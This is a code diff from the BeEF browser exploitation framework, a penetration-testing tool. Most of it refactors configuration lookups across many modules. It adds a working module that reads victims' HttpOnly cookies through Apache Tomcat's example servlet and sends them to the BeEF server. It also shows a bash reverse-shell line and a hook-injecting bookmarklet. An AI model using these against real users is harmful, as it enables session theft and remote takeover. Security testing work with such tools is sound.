+      def public_enabled?
+        !get('beef.http.public.host').nil?
+      end
+      
+      #
+      # Returns the beef protocol that is used by external resources
+      # e.g. hooked browsers
+      def beef_proto
+        if public_enabled? && public_https_enabled? then
+          return 'https'
+        elsif public_enabled? && !public_https_enabled?
+          return 'http'
+        elsif !public_enabled?
+          return local_proto
+        end
+      end
+
+      #
+      # Returns the beef scheme://host:port for external resources
+      # e.g. hooked browsers
+      def beef_url_str
+        "#{beef_proto}://#{beef_host}:#{beef_port}"
+      end
+
+      # Returns the hool path value stored in the config file
+      #
+      # @return [String] hook file path
+      def hook_file_path
+        get('beef.http.hook_file') || '/hook.js'
+      end
+
+      # Returns the url to the hook file
+      #
+      # @return [String] the url string
+      def hook_url
+        "#{beef_url_str}#{hook_file_path}"
+      end
+
+      # Returns the configuration value for the http server port
+      # If nothing is set it should default to 3000
+      def public_port
+        return get('beef.http.public.port') unless get('beef.http.public.port').nil?
+
+        return '443' if public_https_enabled?
+        return '80' unless public_host.nil?
+
+        nil
+      end
+
+      #
+      # Returns the configuration value for the local https enabled
+      # If nothing is set it should default to false
+      def public_https_enabled?
+        get('beef.http.public.https') || false
+      end
+
       #
       # Returns the value of a selected key in the configuration file.
       # @param [String] key Key of configuration item
@@ -163,6 +276,19 @@ module BeEF
           )
         end
       end
+
+      private
+
+      def validate_public_config_variable?(config)
+        return true if (config['beef']['http']['public'].is_a?(Hash) || 
+                        config['beef']['http']['public'].is_a?(NilClass))
+
+
+        print_error 'Config path beef.http.public is deprecated.'
+        print_error 'Please use the new format for public variables found'
+        print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
+        false
+      end
     end
   end
 end

core/main/console/banners.rb

@@ -48,7 +48,8 @@ module Banners
     def print_network_interfaces_count
       # get the configuration information
       configuration = BeEF::Core::Configuration.instance
-      beef_host = configuration.get('beef.http.host')
+      # local host
+      beef_host = configuration.local_host
 
       # create an array of the interfaces the framework is listening on
       if beef_host == '0.0.0.0' # the framework will listen on all interfaces
@@ -77,27 +78,26 @@ module Banners
     #
     def print_network_interfaces_routes
       configuration = BeEF::Core::Configuration.instance
-      proto = configuration.get("beef.http.https.enable") == true ? 'https' : 'http'
-      hook_file = configuration.get("beef.http.hook_file")
+      # local config settings
+      proto = configuration.local_proto
+      hook_file = configuration.hook_file_path
       admin_ui = configuration.get("beef.extension.admin_ui.enable") ? true : false
       admin_ui_path = configuration.get("beef.extension.admin_ui.base_path")
 
       # display the hook URL and Admin UI URL on each interface from the interfaces array
       self.interfaces.map do |host|
         print_info "running on network interface: #{host}"
-        port = configuration.get("beef.http.port")
+        port = configuration.local_port
         data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
         data += "UI URL:   #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
         print_more data
       end
 
       # display the public hook URL and Admin UI URL
-      if configuration.get("beef.http.public")
-        host = configuration.get('beef.http.public')
-        port = configuration.get("beef.http.public_port") || configuration.get('beef.http.port')
+      if configuration.public_enabled?
         print_info 'Public:'
-        data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
-        data += "UI URL:   #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
+        data = "Hook URL: #{configuration.hook_url}\n"
+        data += "UI URL:   #{configuration.beef_url_str}#{admin_ui_path}/panel\n" if admin_ui
         print_more data
       end
     end
@@ -130,9 +130,9 @@ module Banners
     def print_websocket_servers
       config = BeEF::Core::Configuration.instance
       ws_poll_timeout = config.get('beef.http.websocket.ws_poll_timeout')
-      print_info "Starting WebSocket server ws://#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
+      print_info "Starting WebSocket server ws://#{config.beef_host}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
       if config.get("beef.http.websocket.secure")
-        print_info "Starting WebSocketSecure server on wss://[#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
+        print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
       end
     end
   end

core/main/console/commandline.rb

@@ -19,6 +19,8 @@ module BeEF
         @options[:port] = ""
         @options[:ws_port] = ""
         @options[:interactive] = false
+        @options[:update_disabled] = false
+        @options[:update_auto] = false
 
         @already_parsed = false
 
@@ -55,6 +57,14 @@ module BeEF
                 @options[:ws_port] = ws_port
               end
 
+              opts.on('-ud', '--update_disabled', 'Skips update') do 
+                @options[:update_disabled] = true
+              end
+
+              opts.on('-ua', '--update_auto', 'Automatic update with no prompt') do 
+                @options[:update_auto] = true
+              end
+
               #opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
               #  @options[:interactive] = true
               #end

core/main/server.rb

@@ -12,19 +12,12 @@ module BeEF
   module Core
     class Server
       include Singleton
-
-      # @note Grabs the version of beef the framework is deployed on
-      VERSION = BeEF::Core::Configuration.instance.get('beef.version')
-
       attr_reader :root_dir, :url, :configuration, :command_urls, :mounts, :semaphore
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
-        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
-        @root_dir = File.expand_path('../../../', __FILE__)
+        @url = @configuration.beef_url_str
+        @root_dir = File.expand_path('../../../', __dir__)
         @command_urls = {}
         @mounts = {}
         @rack_app
@@ -33,15 +26,15 @@ module BeEF
 
       def to_h
         {
-            'beef_version'  => VERSION,
+          'beef_version' => @configuration.get('beef_version'),
           'beef_url' => @url,
           'beef_root_dir' => @root_dir,
-            'beef_host'     => @configuration.get('beef.http.host'),
-            'beef_port'     => @configuration.get('beef.http.port'),
-            'beef_public'   => @configuration.get('beef.http.public'),
-            'beef_public_port' => @configuration.get('beef.http.public_port'),
+          'beef_host' => @configuration.beef_host,
+          'beef_port' => @configuration.beef_port,
+          'beef_public' => @configuration.public_host,
+          'beef_public_port' => @configuration.public_port,
           'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? 'https' : 'http',
+          'beef_proto' => @configuration.beef_proto,
           'client_debug' => @configuration.get('beef.client_debug')
         }
       end

extensions/admin_ui/api/handler.rb

@@ -28,7 +28,8 @@ module API
           },
           :compress => {
             :dead_code => true,
-          }
+          },
+          :harmony => true
         }
         minified = Uglifier.compile(evaluated, opts)
         print_debug "[AdminUI] Minified #{name} (#{minified.size} bytes)"

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -91,11 +91,13 @@ function locationHashChanged() {
 
   if (id === null) return;
 
+  var zombie = Object.values(beefwui.hooked_browsers).find(hb => hb.session === id);
+
   id = id.replace(/[^a-z0-9]/gi, '');
   console.log("Loading hooked browser with ID: " + id);
   mainPanel.remove(mainPanel.getComponent('current-browser'));
   if(!mainPanel.getComponent('current-browser')) {
-    mainPanel.add(new ZombieTab({session: id}));
+    mainPanel.add(new ZombieTab(zombie));
   }
 
   mainPanel.activate(mainPanel.getComponent('current-browser'));

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -7,12 +7,7 @@
 WelcomeTab = function() {
 
   <%
-    @configuration = BeEF::Core::Configuration.instance
-    beef_proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http";
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    beef_hook = @configuration.get("beef.http.hook_file")
-    hook_url = "#{beef_proto}://#{beef_host}:#{beef_port}/#{beef_hook}"
+    hook_url = BeEF::Core::Configuration.instance.hook_url
   %>
 
     var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"

extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js

@@ -111,8 +111,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
 
           listeners: {
               itemclick: function(item, object) {
-                  var hb_id = this.contextNode.id.split('zombie-online-')[1];
-		              var hb_id_off = this.contextNode.id.split('zombie-offline-')[1];
+                  var hb_id = this.contextNode.id.split('-')[2];
                   switch (item.id) {
                       case 'use_as_proxy':
                            Ext.Ajax.request({

extensions/qrcode/qrcode.rb

@@ -19,9 +19,9 @@ module Qrcode
 
       # get server config
       configuration = BeEF::Core::Configuration.instance
-      beef_proto = configuration.get('beef.http.https.enable') == true ? "https" : "http"
-      beef_host  = configuration.get("beef.http.public") || configuration.get("beef.http.host")
-      beef_port  = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+      beef_proto = configuration.beef_proto
+      beef_host  = configuration.beef_host
+      beef_port  = configuration.beef_port
 
       # get URLs from QR config
       configuration.get("beef.extension.qrcode.targets").each do |target|

extensions/social_engineering/powershell/bind_powershell.rb

@@ -28,11 +28,10 @@ module BeEF
         # serves the HTML Application (HTA)
         get '/hta' do
           response['Content-Type'] = "application/hta"
-          host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
-          port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
-          proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
-          ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
-          payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
+          @config = BeEF::Core::Configuration.instance
+          beef_url_str = @config.beef_url_str
+          ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
+          payload_url = "#{beef_url_str}#{ps_url}/ps.png"
 
           print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
           "<script>

extensions/social_engineering/web_cloner/web_cloner.rb

@@ -14,10 +14,7 @@ module BeEF
           @http_server = BeEF::Core::Server.instance
           @config = BeEF::Core::Configuration.instance
           @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
-          beef_proto = @config.get("beef.http.https.enable") == true ? "https" : "http"
-          beef_host = @config.get("beef.http.public") || @config.get("beef.http.host")
-          beef_port = @config.get("beef.http.public_port") || @config.get("beef.http.port")
-          @beef_hook = "#{beef_proto}://#{beef_host}:#{beef_port}#{@config.get('beef.http.hook_file')}"
+          @beef_hook = "#{@config.hook_url}"
         end
 
         def clone_page(url, mount, use_existing, dns_spoof)

install

@@ -29,6 +29,8 @@ get_permission () {
   if [ "$(echo "${REPLY}" | tr "[:upper:]" "[:lower:]")" = "n" ] ; then
     fatal 'Installation aborted'
   fi
+  
+
 }
 
 
@@ -99,7 +101,6 @@ install_linux () {
   if [ -z "${Distro}" ] ; then
     fatal "Unable to locate installer for your ${OS} distribution"
   fi
-
   readonly Distro
   info "OS Distribution: ${Distro}"
   info "Installing ${Distro} prerequisite packages..."
@@ -235,9 +236,9 @@ install_beef () {
 
   if command_exists bundler${RUBYSUFFIX}
   then
-    bundle${RUBYSUFFIX} install --without test development
+    bundle${RUBYSUFFIX} install
   else
-    bundle install --without test development
+    bundle install
   fi
 }
 
@@ -274,7 +275,12 @@ main () {
   echo "#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#"
   echo
 
+  if [ ! -z ${GITACTIONS:-} ];
+  then
+    info "Skipping: Running on Github Actions"
+  else
     get_permission
+  fi
   check_os
   check_ruby_version
   check_rubygems

modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js

@@ -0,0 +1,53 @@
+//
+// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  request_header_servlet_path = "<%= @request_header_servlet_path %>";
+
+  function parseResponse() {
+    var cookie_dict = {};
+
+    if (xhr.readyState == 4) {
+      if (xhr.status == 404) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] RequestHeaderExample not found");
+        return;
+      }
+
+      if (xhr.status != 200) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected HTTP response status " + xhr.status)
+        return;
+      }
+
+      if (!xhr.responseText) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] No response content")
+        return;
+      }
+
+      beef.debug("[apache_tomcat_examples_cookie_disclosure] Received HTML content (" + xhr.responseText.length + " bytes)");
+
+      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<table.*?>(.+)<\/table>/)[0];
+
+      if (!content || !content.length) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected response: No HTML table in response")
+        return;
+      }
+
+      var cookies = content.match(/cookie<\/td><td>(.+)<\/td>?/)[1].split('; ');
+      for (var i=0; i<cookies.length; i++) {
+        var s_c = cookies[i].split('=', 2);
+        cookie_dict[s_c[0]] = s_c[1];
+      }
+      var result = JSON.stringify(cookie_dict);
+
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies=" + result);
+    }
+  }
+		
+  var xhr = new XMLHttpRequest();
+  xhr.onreadystatechange = parseResponse;
+  xhr.open("GET", request_header_servlet_path, true);
+  xhr.send();
+});

modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+      apache_tomcat_examples_cookie_disclosure:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Apache Tomcat RequestHeaderExample Cookie Disclosure"
+            description: "This module uses the Apache Tomcat examples web app (if installed) in order to read the victim's cookies, even if issued with the HttpOnly attribute."
+            authors: ["bcoles"]
+            target:
+                working: ["All"]

modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
+
+  def self.options
+    [
+      {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
+    ]
+  end
+
+	def post_execute
+		content = {}
+		content['cookies'] = @datastore['cookies']
+		save content
+	end
+end

modules/browser/hooked_domain/deface_web_page/module.rb

@@ -7,9 +7,9 @@ class Deface_web_page < BeEF::Core::Command
 
   def self.options
         @configuration = BeEF::Core::Configuration.instance
-        proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+        proto = @configuration.beef_proto
+        beef_host = @configuration.beef_host
+        beef_port = @configuration.beef_port
         base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
 	favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

modules/browser/hooked_domain/get_stored_credentials/module.rb

@@ -7,9 +7,9 @@ class Get_stored_credentials < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-                beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-                beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+                proto = @configuration.beef_proto
+                beef_host = @configuration.beef_host
+                beef_port = @configuration.beef_port
                 base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
                 uri = "#{base_host}/demos/butcher/index.html"

modules/browser/hooked_domain/site_redirect_iframe/module.rb

@@ -7,9 +7,9 @@ class Site_redirect_iframe < BeEF::Core::Command
   
     def self.options
         @configuration = BeEF::Core::Configuration.instance
-        proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+        proto = @configuration.beef_proto
+        beef_host = @configuration.beef_host
+        beef_port = @configuration.beef_port
         base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
         favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

modules/browser/play_sound/module.rb

@@ -9,9 +9,9 @@ class Play_sound < BeEF::Core::Command
   def self.options
 
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     sound_file_url = "#{base_host}/demos/sound.wav"

modules/debug/test_network_request/module.rb

@@ -13,8 +13,8 @@ class Test_network_request < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     hook_path = @configuration.get("beef.http.hook_file")
 
     return [

modules/exploits/apache_felix_remote_shell/module.rb

@@ -7,7 +7,7 @@ class Apache_felix_remote_shell < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "" if lhost == "0.0.0.0"
     return [
       { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 

modules/exploits/farsite_x25_remote_shell/module.rb

@@ -3,7 +3,7 @@ class Farsite_x25_remote_shell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
       { 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
           'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],

modules/exploits/jenkins_groovy_code_exec/module.rb

@@ -7,7 +7,7 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "" if lhost == "0.0.0.0"
     return [
       { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },

modules/exploits/local_host/java_payload/module.rb

@@ -11,7 +11,7 @@ class Java_payload < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
         {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},

modules/exploits/local_host/signed_applet_dropper/module.rb

@@ -14,7 +14,7 @@ class Signed_applet_dropper < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
         {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},

modules/exploits/m0n0wall/module.rb

@@ -10,7 +10,7 @@ class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb

@@ -10,7 +10,7 @@ class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
 		@configuration = BeEF::Core::Configuration.instance
-		lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+		lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb

@@ -7,7 +7,7 @@ class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

modules/exploits/rfi_scanner/module.rb

@@ -149,7 +149,7 @@ EOS
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-                lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+                lhost = configuration.beef_host
                 lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rproto',

modules/exploits/router/wipg1000_cmd_injection/module.rb

@@ -7,7 +7,7 @@ class Wipg1000_cmd_injection < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    lhost = @configuration.beef_host
     lhost = '' if lhost.to_s.eql?('0.0.0.0')
 
     return [

modules/exploits/shell_shock_scanner/module.rb

@@ -7,7 +7,7 @@ class Shell_shock_scanner < BeEF::Core::Command
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+		lhost = configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'method', 'ui_label' => 'HTTP Method',  'value' => 'GET' },

modules/exploits/shell_shocked/module.rb

@@ -7,7 +7,7 @@ class Shell_shocked < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "LHOST" if lhost == "0.0.0.0"
     payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"
 

modules/exploits/vtiger_crm_upload_exploit/module.rb

@@ -16,7 +16,7 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
     end
 
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
           {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
           {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},

modules/exploits/wanem_command_execution/module.rb

@@ -10,7 +10,7 @@ class Wanem_command_execution < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

modules/exploits/zenoss_3x_command_execution/module.rb

@@ -10,7 +10,7 @@ class Zenoss_command_execution < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},

modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb

@@ -6,7 +6,7 @@
 class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 

modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb

@@ -10,7 +10,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
 	
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 

modules/host/hook_microsoft_edge/module.rb

@@ -6,11 +6,8 @@
 
 class Hook_microsoft_edge < BeEF::Core::Command
   def self.options
-    @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    hook_uri = "#{proto}://#{beef_host}:#{beef_port}/demos/plain.html"
+    configuration = BeEF::Core::Configuration.instance
+    hook_uri = "#{configuration.beef_url_str}/demos/plain.html"
 
     return [
       {'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },

modules/ipec/dns_tunnel/module.rb

@@ -7,7 +7,7 @@ class Dns_tunnel < BeEF::Core::Command
   
   def self.options
 	@configuration = BeEF::Core::Configuration.instance
-	beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+	beef_host = @configuration.beef_host
 
     return [
         {'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },

modules/network/nat_pinning_irc/module.rb

@@ -11,7 +11,7 @@ class Irc_nat_pinning < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
 
     return [
         {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},

modules/phonegap/phonegap_persistence/module.rb

@@ -11,10 +11,10 @@ class Phonegap_persistence < BeEF::Core::Command
   def self.options
 
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    hook_file = @configuration.get("beef.http.hook_file")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
+    hook_file = @configuration.hook_file_path
 
     return [{
       'name' => 'hook_url',

modules/social_engineering/clickjacking/module.rb

@@ -8,9 +8,9 @@ class Clickjacking < BeEF::Core::Command
 
 	def self.options
     		@configuration = BeEF::Core::Configuration.instance
-    		proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    		beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    		beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    		proto = @configuration.beef_proto
+    		beef_host = @configuration.beef_host
+    		beef_port = @configuration.beef_port
     		base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
 		uri = "#{base_host}/demos/clickjacking/clickjack_victim.html"

modules/social_engineering/clippy/module.rb

@@ -14,9 +14,9 @@ class Clippy < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     return [

modules/social_engineering/fake_flash_update/module.rb

@@ -13,9 +13,9 @@ class Fake_flash_update < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
     
     image = "#{base_host}/adobe/flash_update.png"

modules/social_engineering/fake_notification_c/module.rb

@@ -7,9 +7,9 @@ class Fake_notification_c < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
